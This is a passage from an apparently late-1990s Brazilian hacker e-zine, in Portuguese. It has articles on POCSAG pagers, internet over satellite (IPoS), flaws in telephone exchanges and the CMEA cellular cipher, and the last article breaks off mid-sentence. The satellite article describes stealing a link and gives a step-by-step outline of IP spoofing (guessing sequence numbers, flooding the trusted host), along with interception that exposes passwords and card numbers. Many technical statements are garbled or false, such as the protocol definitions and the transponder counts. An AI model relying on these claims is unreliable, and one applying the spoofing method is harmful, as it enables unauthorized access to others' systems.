5 - 0xC , espaco em branco , completacao de bits
6 - 0xA enviadis as data sucessoras , como checagem de perda de data , etc..
7 - EOT , End Of Transmission , paging foi entregue

	O q o pager aproveita dai !?
	Bom , ele somente ira aproveitar a parte 0xE , 0xF , 0xC , ele tbm 
utiliza do POCSAG a checagem do tamanho da mensagem e tamanho dos frames!
direto , esquerdo , acima , abaixo , etc...	

	O output , utiliza uma tensao de 2 volts , para queimar as mensagens
conhecidas , qquer pessoa com mais 1 de QI , deve saber q quando estamos 
falando de armazenamento vitual , nada eh apagado , e sim , desdatado 
(forte essa nao!?)o aot de desdatar um arquivo , eh simplesmente tirar as 
informacoes de q ele existe no computador , assim nao sendo reconhecido nao
pode ocupar espaco virtual , onde cada elemento tem o seu espaco reconhecido
por um sistema virtual e nao fisico , um exemplo disto eh , vc nao pode 
puxar com a sua mao este arquivo , mas vc pode pux-lo por meio de uma 
sequencia logica e q tenha sentido digitada no teclado.. ;p entendeu !?

4) Aspectos a nivel POCSAG .:
   ^^^^^^^^ ^ ^^^^^ ^^^^^^ ^^
	Nesta secao nos iremos mostrar os aspectos opcionais q o POCSAG , pode
utilizar , e olha q sao muitas , mas nos iremos mostrar o basico aqui !

4.1) D-F.O. .:
     ^^^^^^ ^^ 
	Aspecto opcional numero 1 , eh o Dual-Frame Operation , utilizado no
POCSAG , segundo o nome , vc jah deve ter uma ideia basica de como funciona.
	Depois q dois frames de 8 bits forem assinalados (vindos dos 16 bits
normais), usando estas opcoes , vc diminui a capacidade de gastar bateria 
durante a transmissao em cerca de 30% , ele nao desperdica informacao , mas
fica em um estado sleep , enquanto recebe os dados .

4.2) MCS , Message Codeword Structure .:
     ^^^ ^ ^^^^^^^ ^^^^^^^^ ^^^^^^^^^ ^^
	O sistema MCS eh um novo sistema opcional , este utiliza a transmissao
em modo ASCII muito , mas muito perfeito , ela comeca com 1 em 1 bit e assim
vai ateh chegar a 31 e 31 bits , demora mais q a transmissao normal , mas eh
muito eficaiz para mensagens grandes.

4.3) Idle Codeword .:
     ^^^^ ^^^^^^^^ ^^
	Uma nova estrutura de enderecamentos , q se baseia em fonte de 64-bits
e nao a normal de 32-bits , com mais flexibilidade , ela pode baixar a sua
fonte bits ateh 29 bits se for preciso para conseguir uma transmissao 
direito , para conseguir a mudanca repentina para o 32-bits , ele usa um 
simples codigo binario (abaixo):

			"01111010100010011100000110010111"
	
5) Conclusao final .:
   ^^^^^^^^^ ^^^^^ ^^ 
	Agora q o texto acabou , eu jah vou logo avisando o q vem no mes q vem
POCSAG decoder guide , um guia auto-explicativo de como se hackear um pager
rodando POCSAG como protocolo principal . Tbm pretendo fazer um texto 
similar a este , usando outros protocolos como FLEX , GOLAY .

The blood root - reg (c) 1998 The Phone9 Communications Systems 
The POCSAG guide
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> Sistema IPoS .......................................: The blood root <:]

Projeto: Sistema IPoS

1 - Introducao
2 - Caracterisitcas do satelite
  2.1 - Caracteristicas do canal
  2.2 - Configuracao do link
3 - Inicializacao e a transmissao
  3.1 - Introducao 
  3.2 - Conjunto de datas
  3.3 - segmentos de inicializacao
  3.4 - Resposta da familia de protocolos
4 - Sp00fing
  4.1 - Tecnicas de spoofeamento - Federal 
5 - Snood
  5.1 - funcao do snood
  5.2 - Tecnicas de snood sobre satelite
6 - No proximo....
7 - Conclusao 

	Muitos devem estar se perguntando q porra de IPoS eh esta!? Ou entao,
Seu burro eh IPv6 e por ai vai , mas na verdade o q nos estamos tentando 
falar eh , o IPoS eh um sistema jah existente , q eh usado inclusive pela 
Embratel , o q o IPoS faz !? Bom , pelo nome tire as suas proprias 
conclusoes Internet Protocol Over Satellite , eh um sistema de conexao a 
internet por meio de satelite , utilizando os programas como netscape , 
normalmente , pois vc estah usando o TCP/IP via satelite .
	Desenvolvido no ano de 1994 pela NASA , foi um projeto q se espalhou
pelo mundo todo , mas nunca foi muito usado , pois ninguem quer pagar 4.000
para acessar a internet , mas o q vale aqui eh a experiencia , e no q cabe a
isto , ateh q dah para levar nas coxas . Consistindo em usar o Transmission
Control Protocol , e sua suite de protocolos (ICMP, IP , FTP , UDP , etc..!)
usando canais de downlink para a terra como o meio de conexao , pelo menos
no brasil , vc se conecta direto com os roteadores da embratel , eh como se
a embratel fosse um servidor comum de internet , e ainda por cima , usando 
um satelite como meio de conexao , a agilidade aumenta e pode chegar a 
oferecer cerca de 2 megabytes por segundos (Uahu!).
	O objetivo deste texto , alem de introduzir e engrecar os 
conhecimentos de muitos leitores da nossa zine , eh discutir os recursos q 
este sistema oferece e talvez mais tarde poderiamos chegar a conclusao de q
eh possivel se roubar um link deste , tbm sempre comparando a performace do
TCP quando transmitido dentro de um canal de satelite .
	
2) Caracterisitcas do satelite

	Bom , levando em conta q vc nao ira conseguir ter uma conexao assim ,
sem ter o satelite no meio , eh um pouco basico q vc gfique sabendo como
funciona o satelite nos aspectos tecnicos para este projeto .

	Usando um orbita Geostacionaria (GOS), com um altitude de 36,000 km.
	Naquela altitude a orbita eh a mesma q a da terra . Embora tao longe,
	nao eh impossivel de ser o satelite em sua orbita daqui da terra , a
	olho nu talvez !? A propagacao dos sinais de RF (Radio Frequency), q
	ira viajar da estacao terra , para o satelite e do satelite para a sua
	casa eh de 239.6 milisegundos . Do satelite ateh a estacao base , a 
	distancia viajada eh de 2 x 41,716 km, com um propagacao de ondas de
	279.0 milisegundos .
	
	A taxa de interferencia de outras orbitas eh quase zero , jah q 
	satelites para outras finalidades , nao tem sua orbita naquela altura,
	mesmo incluindo as possibilidades da LEO (Low Earth Orbit - Orbita Da
	Terra)ou entao a MEO (Medium Earth Orbit - Orbita Media da Terra)
	inteferirem na capacidade de transmissao do satelite .
	
	Com a disponibilizacao de um sistema SS (Switching Satellites) q faz
	a mudanca automatica do satelite de uso , desde de quando o satelite
	padrao , vai para longe da estacao base e o satelite fica praticamente
	inutil , eh ai q entra o sistema SS , ele muda para o satelite q faca
	aquele servico , e q esteja mais perto da base , deixando o outro 
	disponivel .

	
2.1) Caracteristicas do canal

	O sistema IPoS utiliza o satelite como meio de comunicacao , e o 
satelite utiliza os canais para conseguir transmitir as suas datas , entao
vamos entender como funciona o sistema de canais do satelite .

	Os unicos assuntos q nos devemos discutir sobre os canais de satelites
sao as caracteristicas q mais se querem saber :

	Barulho - Existe sempre a possiblidade da transmissao do canal , estar
uma bosta , neste caso as data em RF nao serao transmitidas como deveriam ,
podendo ateh causar o derrubamento da pessoa on-line ou ateh entao falha de 
routeamento , causando uma conexao tao lenta q sera melhor vc sair da 
internet do q continuar aquela velocidade . Como a maior caracteristica do
satelite eh permitir q pessoas muito distantes troquem dados agilmente , eh
necessario q vc tenha em mente q o satelite pode trabalhar longe do seu 
ponto origem , mas nao no Japao porra! Existe uma qualidade e orbita basica 
designada pelo satelite (assunto discutido abaixo).
	Tbm existem varios outros problemas quanto a qualidade do canal , 
desde tipo de ondas , ateh obstrucoes , os meios de se acabar com um link 
via satelite para a terra sao :
1. Obstrucao atmosferica , quando o satelite esta fora da atmosfera da terra
   eh capaz q algumas ondas nao passem por esta camadas , obstruindo o fluxo
   de data.
2. Obstrucao material , quando o satelite envia os dados de qquer lugar da
   terra e quando ele vai chegar no seu destino , ele simplesmenteeh 
   obstruido ou por uma montanha , ou por um tunel , ou por qquer outro 
   objeto fisico q venha a ficar na frente do destino da transmissao
3. Obstrucao climatica , quando chuvas e trovoes acontecem durante a 
   transmissao , podendo causar no caso , desmagnetizacao do satelite ,de 
   corrompimento fisico da data transmitida .

	Mas eh claro q nao se eh possivel , ter sempre um erro e assim ninguem
recebe as datas enviadas nunca , existe uma margem de erro muito pequena e 
uma margem ou capacidade de protecao bem grande . Basicamente os numeros sao
estes , a quantidade de chances de q um unico e insignificante bit seja 
perdido durante a transmissao , eh de 1 em 10 milhoes e a possibilidade eh
ainda maior quando a possiblidade de se perder um bit importante , como por
exeplo o header de um IP , eh de 1 em 12 milhoes . O ultimo e o melhor 
sistema de protecao de perda de data eh conhecido como AECC (Advanced Error
Control Coding), este q pode ser adcionado fisicamente por meio de um 
hardware ligado ao PCB (e q PCB :p)do satelite , um exemplo de onde eh usada
este sistema eh na comunicacao via fibra-otica , ele usa isto no 
Decodificador optical , ele simplesmente faz uma checagem de 2 em 2 segundos
dos bits , caso algum esteja faltando ele automaticamente , notifica o 
satelite q ira reenviar este bit para odestino denovo , e denovo , ateh q o 
bit seja devidamente enviado , os creditos para este sistema devem ser 
acrescidos a Reed Solomon (q nome hein ;p).

	Frequencia - Normalmente usando ondas RF (Radio Frequency), operando 
em diferentes canais , e permitindo uma dinamicidade imensa durante as 
transmissoes , as frequencias deveriam fazer isto , podende ser medidas 
desde Hz ateh Ghz , inclundo varios outros *.z q podem existir por ai . No
sistema IPoS a quantidade de canais e limitada por questao de seguranca , o
sistema basico PTP (Point-To-Point), usa um Uplink (da terra para o 
satelite) de 6 Ghz e um downlink de 4 Ghz , usando a banda C , e 14/15 Ghz
de banda Ku , e um novo servico na banda Ka perto do 30/20 Ghz . A base de 
repeticao do satelite agora usam transponders . A tradicional banda C , usa
um transponder de 36 Mhz , para acomodar um cor para transmissao via TV ,
jah os transponders da banda Ku , normalmente fica na casa dos 50 Mhz .
Leve em conta q um satelite leva no minimo uns 1.000.000.000 (hehe!) 
transponders , cada um podendo operar em diversas frequencias !
	
	Erro de transmissao - A taxa de BER (bit-error Rate) eh imensa , 
considerando q existem varios programas e daemons rodando q podem fazer o 
monitoramento dos pacotes , reenviando ou ateh mesmo corrigindo estas 
datas corrompidas , como TCP eh enviado por meio de um sinal , estes sinais
podem ficar congestionado ou ateh serem mixados , ou q pode dar um bom DoS,
no usuario q receber o presente . Mas o maior problema eh q a performasse 
do BER causa uma falha imensa na transmissao do TCP , por exemplo 	

	Mas visto estas grandes falhas ou erros q existem no sistema de 
satelites , vc deve estar pensando , pagar 4 mil por mes , por isto , vc 
bebeu ? Mas , tbm existem o lado bom da conversa , senao o sistema seria 
inutil e sem retorno .

	MUA - O sistema MUA ou Mobile User Allowed , eh um sistema q permite q
vc use o sistema de satelite em movimentacao , por exemplo , vc estah 
andando de trem , se vc colocar o seu receptor em uma posicao boa , ele ira
pegar as frequencias normalmente , nao interca o quao rapido ou longe vc 
esteja .	

	LLF - Loop Longo do Feedback , eh um sistema q trabalha junto com a 
propagacao de data do canal do satelite . O q ele tenta fazer eh manter um
padrao imovel do fluxo util de datas enviadas via TCP , este tipo de servico
eh bastante util durante o uso do telnet , pois senao o seu telnet nao 
ficaria com aqueles lags de 2 em 2 segundos .

	DBP - Delay Bandwith Product , define um grupo de datas q devem ser 
enviadas antes da conexao fisica ou virtual (por exemplo , existe uma 
batelada de codigos q sao enviados antes de qquer programa ser inicializado,
ou antes de qquer conexao ser aceita , estes sao os arquivos conhecidos como
"In Flight!". Para fazer com q estes dados sejam enviados mais rapidos e 
assimn q a respostas seja praticamente imediata , eh necessario , o TCP ira
enviar um grupo ou dois no maximo de "data in flight" assim a conexao eh 
aberta quase q instantenamente .

	AB - Assimetria Basica , eh um sistema q dah maior capacidade aos
satelites aos equipamentos em volta ou entor do satleite , a cooperarem de 
forma rapida e eficaiz 

	
2.2) Configuracao do link
	
	A estrutura de um link em satelite eh muito mais complexa do q um 
, existem varios meios de se fazerem um link via satelite , a 
palavra link quer dizer uma conexao q troca informacoes entre si , sendo 
confiavel ou nao , a questao toda deste paragrafo , eh discutir as reacoes e
o uso do link de satelite quando em uso de tcp .

	Estrutura linkal : Etah , q nome hein , mas seja como for , a 
estrutura linkal , geralmente eh composta por dois elementos basicos , 
uplink e downlink , sao destes 2 q tudo comeca a progredir e ser usado .
	Para entender melhor o uplink e downlink , veja :
	Vamos dizer q a estacao de tv "global" , queria abrir uma conexao para
todos os seus usuarios , usando como base o satelite SBTS , e enviar estas
ondas para a o SHT , q trabalha tbm em UHF , usando o satelite SBTS , agora
vamos aos diagramas :
	                     ::
			 ((((((((:: ))))))))           
	tv global	(((((	/¯¯¯¯¯\  ))))))))
	/¯¯¯¯¯¯¯\ ((((((( \SBTS_/       )))))))    /¯¯¯¯¯¯¯\
	|  (0)  |((((((((                 )))))))) |  (0)  |
	\_______/                                  \_______/
	   /¯\						    /¯\
       /¯¯¯¯¯\ 						  /¯¯¯¯¯\
	/¯¯¯¯¯¯¯\						 /¯¯¯¯¯¯¯\ 
  .----------------.				  .----------------.
  :> .REDE GLOBAL <:				  :> .:REDE SHT:. <:	
  `----------------'				  `----------------'

 ::
 ::
/¯¯¯¯¯¯\ = Satelite
\______/ = em SBTS
>>>><<<<
/¯¯¯¯¯¯¯\ = Receptor
|  (0)  | = e emissor
\_______/ = de ondas para satelite
>>>><<<< 
REDE GLOBAL : Nos usamos pseudonimos , para nao sitar a tv mais 
		  sensacionalista do mundo , pois a global "Tem um caso com 
		  o Roberto Marinho " - Tv global "Stick it on your ass"
REDE SHT : Sistema Horrivel de televisao e internet , eh a SBT , domina pelo
	     "ha , haie!" do Silvo Santu , um merda q era engraxate quando 
	     pequeno e hoje em dia caga verde de tanta grana!
((((((( : Maneira mais facil de se representar as ondas q sao transmitidas

	Otimo , agora vamos a teoria , a estacao global , levantou um link ,
em uma frequencia , em uma banda , em um tipo de frequencia , otimo , as 
configuracao por exemplo foi : 234MHz , banda Ku , VHF , agora vejamos o q 
aconteceu , foi levantado o pedido de uma conexao da terra para o satelite,
o temro q designa esta acao eh conhecida como uplink (link para cima :p), e
digamos q a conexao foi realmente aberta , o satelite ira repassar estas 
informacoes para o SBT , entao ele ira enviar as informacao de um ponto 
A para um ponto B , sendo usado o Satelite , como meio de conexao entre 
ambos , agora a acao q o satelite ira tomar eh fazer um downlink , ou seja ,
enviar algo do satelite para outra estacao na terra . 
	Entao vcs jah viram como eh q se comeca e como se termina um link via
satelite , no caso do tcp o uso eh o mesmo , nada muda de forma imensa e 
consideravelmente diferente , soh sao atribuidas algumas reacoes dos 
roteadores , e outros novos aparelhos q sao instalados e q podem interferir 
em qquer outra conexao .

3. Inicializacao e a transmissao .:

	Bom  agora nos iremos tratar diretamente da reacao do tcp , sobre o 
satelite , depois de estudar superficialmente as caracterisitcas e funcoes 
do satelite , vamos comecar a falar do tcp q eh o q realmente importa .


	Devido ao algoritimo usado para comecar a conexao , eh usado uma 
inicio bastante lento , podendo dizer q este eh mais devagar do q o inicio
da transmissao em um servidor , tbm levando em consideracao q o algoritimo,
eh uma importante parte nas relacoes de seguranca do satelite , usando os 
mais sofisticados meios de encritacao , alem de usar o firewall c3 da NASA,
como manuseador de data .
	A transmissao downlink , sendo mais devagar q a uplink (pra baixo todo
santo ajuda! hehehe!), eh enviado um unico pacote para o receptor , para 
cada ACK (acknowledgment) retornado , usando uma tabela de somente um 
segmento , fazendo a conexao crescer automaticamente para o RTT , usando 
uma transmissao de longa distancia , isto pode interferir e muito nas 
conexoes de pequeno porte , como conexoes em www , ou ftp , devido a baixa
quantidade de pacotes , nao existe tempo e data o suficiente para permitir q
o satleite aumente a sua velocidade e comece a transmitir mais rapido , mas
ai vc confuso perguta "Entao como q a transmissao eh tao rapida!", bom , 
quando se usa uma bbs , na qual sao enviados pacotes multiplos em uma 
sequencia massiva , nao se usa uma conexao dependente , q faz uma checagem
de data a todo o momento , ao contrario de uma conexao via satelite ou ateh
mesmo servidor , onde a qause cada segundo , eh necessario se enviar um
pacote para o usuario , ou para checar conexao , ou para conectar em algum 
lugar , ou para simplesmente executar algum servico , sendo assim a conexao
fica cada vez mais rapida , permitindo q a conexao fique cada vez mais 
rapida e melhor .
	Em outros casos a conexao fica lenta no inicio devido ao RTT , q ira 
aumentar a sua capacidade e velocidade de acordo com o tamanho e data a 
transmitir .
	
	Hoje em dia jah se foram criados varios meios de como se diminuir o 
estrago q esta inicializacao alerdada causa na conexao de um usuario , o 
tempo sugerido pelo projeto eh simplesmente resumido nesta linha .
	
			min (4*MSS, max (2*MSS, 4380 bytes))
	
	O unico problema deste tipo de sistema , eh q talvez nao exista tempo
o suficiente para se comecar uma conexao com menos taxa de erro , fazendo
assim com q a margem de erros durante uma conexao seja bem maior do q a de
normal.
	Enviando dois segmentos no lugar de um segmento , o primeiro segmento
eh muito vulneravel , nao precisando da um confirmacao via pacotes do ACK,
de q eh realmente seguro prosseguir , sendo o segundo super reforcado , soh
saindo depois de uma checagem dupla do pacote a ser enviado .\

3.3) Resposta da familia de protocolos

	A familia de protocolo ainda eh a boa e velha Internet Protocol Suite,
contando com todos os mesmos recursos q um servidor conta .
	IP - Internet Protocol , eh um endereco de um ususario na net , sendo
	     usado como uma endereco de casa , o lugar onde se eh possivel 
	TCP - Transference Control Protocol ,  eh o protocolo q faz toda a 
		movimentacao e controle de todos os pacotes transmitidos
	UDP - User Datagram Control , seria o protocolo renegado , usado em 
	      backgorund eh mais como um transportador escondido de datas.
	ICMP - Internet Control Message Protocol , eh o protcolo usado em IRC
		 comumente usado em sistema unix em sistema talk , etc..
	FTP - File Transference Protocol , ehum sistema de mapeamento simples
	      de arquivos q permite um download direto entre maquinas
	Basicamente sao estes , mas usados em NTs , UNIXs , Windows e outros 
sistema operacionais , ainda existem os pup , egp , rvd , rdp , xns-idp , 
hmp , gopher , etc....
	
	O sistema IPoS possui acessibilidade para todas estas familias de 
protocolos , q estao sendo humildemente usadas para se conectar a internet.

4) Sp00fing

	A tecnica de sp00fing foi explodida no espaco cibernetico pelo c0ndor,
mas quem eh este tal de c0ndor ? Kevin D. Mitnick (lembrou!?), ele usou uma
tecnica teorica e a colocou na pratica usando este ataque para ficar mais de
1 vez na maquina do samurai , Tsutomu Shimomura , a tecnica eh muito 
simples considerandos os seus principios basicos , mas pode ser um pe no 
saco , ou do admin ou do spoofeador , para achar um base de informacoes 
necessarias para se cometer o spoof .
	A palavra spoof q quer dizer , trapacear , simplesmente explica tudo o
q vc precisa saber o q eh o ip spoof na internet , basicamente eh mudar a 
fonte do seu ip , trocando-o com o ip de uma outra pessoa (existem varias
tecnicas de spoof alem do ip , DNS , gateway , etc..!).
	O spoof quando aplicado sobre uma conexao IPoS , tera q ser dividido 
em duas partes , parte 1 : Entre o cliente (spoofer!), e o routeador e 
satelite , e outra entre o routeador do gateway , e o servidor de internet.
	[ Para saber mais sobre ip spoof , um amigo meu memkeeper , escreveu 
um texto bastante explicativo , sobre ip spoof na internet , texto abaixo ,
thanx dude , & Psycho's hack team , cee ya dudes! ]

4.1) Tecnica de ip spoof

	O spoofing do IP envolve o fornecimento de informações falsas sobre 
uma pessoa ou sobre a indentidade de um host para obter acesso 
não-autorizado a sistemas e/ou aos sistemas que eles fornecem. 
	O spoofing interfere na forma como um cliente e um server estabelecem 
uma conexão. Apesar de o spoofing poder ocorrer em diversos protocolos 
específicos, o spoofing do IP é o mais conhecido dentre todos os ataques de 
spoofing. 
	A primeira etapa de um ataque de spoofing é identificar duas maquinas 
de destino, que chamamos de A e B. Na maioria dos casos, uma maquina terá um
relacionamento confiável com a outra. + esse relacionamento que o ataque de
spoofing tentará explorar. Uma vez que os sistemas de destino tenham sidos
identificados, o violador tentará estabelecer uma conexão com a maquina B de
forma que B acredite que é uma conexão que vem de A, quando na realidade a
conexão vem direto da maquina do violador, que chamaremos de X. Isso é
feito através da criação de um pacote falsa(criado na maquina X, mas que
contém o endereço de origem de A) solicitando uma conexão com B. Mediante
o recebimento desse pacote, B responderá com um pacote semelhante que
reconhece a solicitação e estabelece números de sequência.
Sob circunstancias normais, esse pacote de B seria combinada a um terceiro
pacote reconhecendo o numero de sequência de B. Com isso, o "handshake"
seria concluído, e a conexão poderia prosseguir. No entanto, como acredita
que está se comunicando com A, B envia sua resposta a A, e não para X. Com
isso, X terá de responder a B sem conhecer os números de sequência gerados
por B. Portanto, X deverá adivinhar com precisão os números de sequência
que B utilizará. Em determinadas situações, isso é + fácil do q você pode
imaginar.
No entanto, alem de adivinhar o números de sequência, o violador deverá
impedir que o pacote de B chegue até A. Se a msg tivesse de chegar a A, A
negaria ter solicitado uma conexão, e o ataque de spoofing falharia. Para
alcançar esse objetivo, normalmente o hacker enviaria diversos pacotes a
maquina A para esgotar sua capacidade e impedir que ela respondesse ao
pacote de B. Essa técnica é conhecida como violação de portas. Uma vez que
essa operação tenha chegado a fim, o violador poderá concluir a falsa
conexão.
O spoofing de IP aqui descrito é uma estratégia desajeitada e intediante. No
entanto existem ferramentas que fazem isso em menos de 20 segundos...! Para
a nossa felicidade..

5) snood

5.1) Funcao do snood

	O snood eh um ataque q pode ser originado tanto via satelite quanto ,
via internet normal , o q ele faz eh basica implementar um redirecionamento
multiplo de informacoes em tcp , ou seja .

	A -----------> B
			   B -----------.-------> A
					     \
      					\
						 \
						  \-> C

	Ou seja , o host A q eh um ip normal , abre uma conexao para o host B,
dali , o host B recebe o pedido do host A , e envia um pacote de volta para
o host A , trazendo a resposta , o q o snood faz eh , depois q a resposta eh
enviada para o A  ,existe um host C q entra no meio da conexao , criando uma
situacao de ips multiplos , onde o TCP eh dividido em duas partes iguais com
as mesmas funcoes , assim eh aberta uma conexao entre dois ip , ao invez de
um ip .
	
5.2) Tecnicas de snood sobre satelite

	Nos aqui iremos nao discutir as tecnicas e sim os efeitos do snood ,
dentro de um satelite ,podendo ser assim um ip muito perigoso para a rede 
inteira :

	1. O snood pode causar um imensa falha e perda de velocidade na 
	   transmissao em tcp , o q acontece eh , quando o ip C , receber uma
	   unica linhagem de tcp , devido a divisao do pacote duplo , o unico
	   problema do snood eh q quando se eh dividido uma conexao , o tcp
	   pode separar de modo errado as datas , causando assim ou o erro de
	   fluxo de tcp , ou entao a qeda do usuario da rede
	2. Usando uma conexao muito grande para ser divido em dois , talvez 
	   seja um problema na hora de se abrir o espaco o suficiente para se
	   ser enviado o tcp , podendo causar um flood no usuario
	3. Outro metodo alem da divisao de pacotes , tbm pode ser o 
	   compartilhamento de data comprometedora , como senhas de internet
	   e cartoes de credito.
	
	[ Eh aconselhavel a lida de um texto escrito pelo csh , da Axur05 ,
        www.axur05.org , na edicao 03 da revista , sobre um projeto chamado 
        de Multiplies IPs , isto ira simeplesmente cair como luva nisto !]

6) No proximo

	Nos iremos mostrar as configuracoes e reaoces do TCP em si , dentro 
das conexoes via satelite , e ainda mais um bonus sobre hacking o satelite!

7) Conclusao

	Por hoje eh soh , eu acho q jah deu para dar um boa introducao sobre o
q nos estamos falando .
	Agradecimentos 
	Memkeeper - Texto sobre tecnicas de spoofing . 
                  url : http://www.geocities.com/SiliconValley/Lakes/5291/
	csh - Texto sobre multiplos IPs da Axur0503.new url : www.axur05.org 
	
The blood root - reg 1998 (c) The Phone9 Systems - [ PCS ]
Sistema IPoS 
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> Falha no sistema de comunicacao digital x analogica : The blood root <:]

	O eu quero discutir aqui eh uma presente falha no sistema da telebras,
como telesp , telerj etc... , devido a mudanca de centrais analogicas para
digitais , presentemente , existe um problema muito comum .
	
	Basicamente o problema eh , quando uma pessoa A liga para uma pessoa
B , o q acontece , eh q se faz uma ligacao baseada em duas centrais , a 
central da A e a do B , fazendo uma rede telefonica .

	Otimo , agora levando em consideracao q a CT da A eh uma central 
digital , e a central da B eh uma central analogica , como vcs jah devem 
saber , nao deveria dar certo um 286 operando com um windowsNT 4.0 , em um
hd de 200mgbytes , de qquer modo a ligacao quando funcionando ficaria mais 
ou menos assim .:


	.------.			.-----------.	
	: CT-A :--------------->: Rede Tel. :
	`------'			`-----------'
	    ,--------------------------^
	.------. 			.-----------.
	: CT-X :--------------->: Rede Tel. :
	.------.			`-----------'
	: CT-B :<---------------: Rede Tel. :
	`------'			`-----------'
		
PS : Como a seta indica (>|<) , existe um caminho no qual uma ligacao da
central A indo para a central B deve passar , no caso dos dois A e B , a 
central q esta no meio dos dois eh uma central analogica , assim como a 
central B e a central A eh uma central digital , vamos aos fatos .

	Quando o usuario A tira o telefone do gancho , e o sinal vem , ele 
ira discar 234 (codigo da CT-B) e depois 5678 (numero do telefone), entao 
a ligacao ira sair a procura de uma central com o codigo 234 , ela achou ,
a rota de trajetoria eh , use os fios da rede telefonica para chegar a 
central X , de lah , vc ira acessar automaticamente os cabos q irao te 
levar a central B e assim a ligacao sera terminada .
	Tah , isto tudo eu jah sabia , mas qual eh a falha !?

:> Falha - b0gwar

	O q acontece podem ser uma lista de impessilios , e de problemas .
1. Vc nunca ligou para alguem q esteja em uma central digital , e demorou 
   muito para a ligacao ser feita , ou seja , chamar .
   Motivo 1 :
   O primeiro motivo eh , quando ocorre a transicao e a passagem por uma 
   ou mais centrais digitais , pode ocorrer uma falha , jah q a maioria das
   instrucoes em centrais digitais sao computadorizadas ou por meio de tons
   Motivo 2 :
   Obstrucoes fisicas ou virtuais podem e interferem na comunicacao , 
   cauzando o atrazo repentino de uma ligacao .

2. A ligacao dah ocupada antes de chamar ou dar um tempo para a resposta :
   Um , o problema pode ser tanto de A , ou de B , ou entao AB , ai fica a 
   sua escolha optar por uma q possa estar acontecendo na sua area .
   Motivo 1 :
   Problema na CT-A : O q pode ocorrer , q durante a conexao de uma central
   digital , ou q pode ser cerca de 5x mais rapido q uma conexao analogica,
   o q pode acontecer q quando viajarem os dados da central analogica e 
   digital , eh capaz q ao serem processadas as digitais cheguem primeiro e
   a demora de uma informacao analogica dah como perdido o pacote , assim 
   dando ocupado repentinamente sem nenhuma razao
   Motivo 2 :
   Problema na CT-B : Sendo uma central analogica , alem de ter o problema 
   de nao compriender os dados enviados de uma central digital , sempre 
   existe a opcao de q central analogica esta ocupada , ou sjea , todas as
   maquinas e operadoras humanas ou roboticas estao ocupadas com alguma 
   coisa nao tao importante quanto a sua ligacao , dando assim um sinal de 
   ocupado , logo apos qquer pedido de discagem.
   Motivo 3 : 
   Problema na CT-A e CT-B : Quando isto acontece ou a rede eh um chaos , 
   como telerj , ou entao ainda eh muito crianca e de tao mal feita deixa na
   mao milhares de assinantes . O q acontece , eh q quando se chega as 
   informacoes de uma ligacao , passando por duas ou mais centrais 
   diferentes do formato do ligador (digital), acontece a desistencia por 
   mera piedade da central e nao deixa-la ocupada por uma tarde inteira 

3. Call id b0g 
   Motivo 1 :
   Este motivo foi explicado por blydD , mostrando em um documento , severas
   falhas em um sistema de bina passando por diferentes centrais . Uma delas
   eh o problema de rota digital----analogica---analogica , obviamente 
   desviando o pacote ANI enderecado ao receptor da ligacao , nao sendo 
   identificado

4. TASI , internacional ou nacional 
   Explicado pelo worm_root da (ou era , sei mais nao!) axur5 , ele mostrou 
   um documento explicando o problema atual em comunicacao em ligacoes para
   o exterior baseadas em satelites , tbm existem varios meios de se obter 
   um b0g como este , em casos similares > no nosso caso , o problema pode 
   ocorrer em diferentes casos .
   Motivo 1 :
   Quando se liga para paises (internacionais!? heh!), o q acontece eh , 
   alem de ser possivel acontecer o problema q o worm_root explicou , o q 
   tbm pode acontecer eh ouver um maior retardamento por parte de uma ma 
   troca de informacoes baseadas no satelite e em duas centrais de 
   diferentes portes , como analogicas e digitais .
   Motivo 2 :
   No caso de nacional , em ligacoes interestaduais , eh capaz de existir ,
   algumas falhas , e tbm conversas como o worm_root mostra , mas de qquer 
   modo acontece demora na conexao de um telefone e tempo de esperar muito 
   alerdado .

	Estas sao uma das falhas q existem atualmente em sistema porcos q 
somente passam para digital , algumas centrais de playboys e filinhos de 
papais q tem 266's como brinquedinho de tamagoxi (Ou sei la oq !?)
	Proxima edicao eu coloco algumas maneiras e coisas q vc pode fazer 
para concertar ou melhor alguns b0gs.

cee y0* DuDe		
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> b0g no sistema CMEA de celulares ...................: The blood root <:]

	Em 1995 quando comecaram a nova era de celulares , construiram uma 
imensa base de pequenos sistemas de seguranca ou de simples comodidade para
o dono do celular , depois da revolucao conhecida como Micro TAC , da 
motorola , chegou-se a conclusao de q a seguranca seria necessaria depois 
da grande popularizacao dos celulares , era capaz de alguem conseguir achar 
mais falhas do q o clone , falhas tais como TEST-MODE e escuta celular , 
reprogramacao da EEPROM , EPROM , PROM , do celular para motivos nao 
agradaveis para as telcos , sendo assim foram criados varias partes dentro
do sistema celular , como por exemplo , CMEA , um sistema de encriptacao de
data/voz transmitida pela parte onde se fala do celular . 
	
	Descoberto por David Wagner , com o auxilio de Bruce Schneier , 
durante trabalhos pesado no ano de 97 , ele estudaram profundamente o 
sistema de encriptacao do Cellular Message Encriptation Algorithm , e 
conseguiram achar falhas consideraveis neste sistema .

0:> Prefacio 
1:> CMEA , pequena introducao

.:>>>>>>>>>>>>>>>>>>>>>>>>>>>> fUck1n' 31337 <<<<<<<<<<<<<<<<<<<<<<<<<<<<<:.

1:> CMEA , pequena introducao <:

	Pense em um sistema de encriptacao de data , transmitidas pelo 
transmissor do telefone , ele eh utilizado para proteger de hitechnikkers
datas como tons DTMF , ou entao algum tipo de frequencia q seja enviado 
pelo microfone do celular.

	O CMEA possui um sistema nao-linear , no seu inicio , do primeiro ao
terceiro bit de 8-bits , sao conhecidos pelo CMEA e celular como $T$-box.
O $T$-box , calcula o seu output assim :
T(x)	&=& C(((C(((C(((C(((C((x \oplus K_0)+K_1)+x) \oplus K_2)xK_3)+x)
	\oplus K_4)+K_5) \\
	&& +x) \oplus K_6)+K_7)+x)

	E como input o bit $x$, e um $K_{0 \ldots 7)$.
	Nesta equacao $C$ e um diskeyado de 8-bits, conhecido no celular como
o CaveTable; todas as operacoes sao usadas com uma base de 8-bits.

	Agora o algoritmo de encriptao da mensagem $n$-byte para um texto 
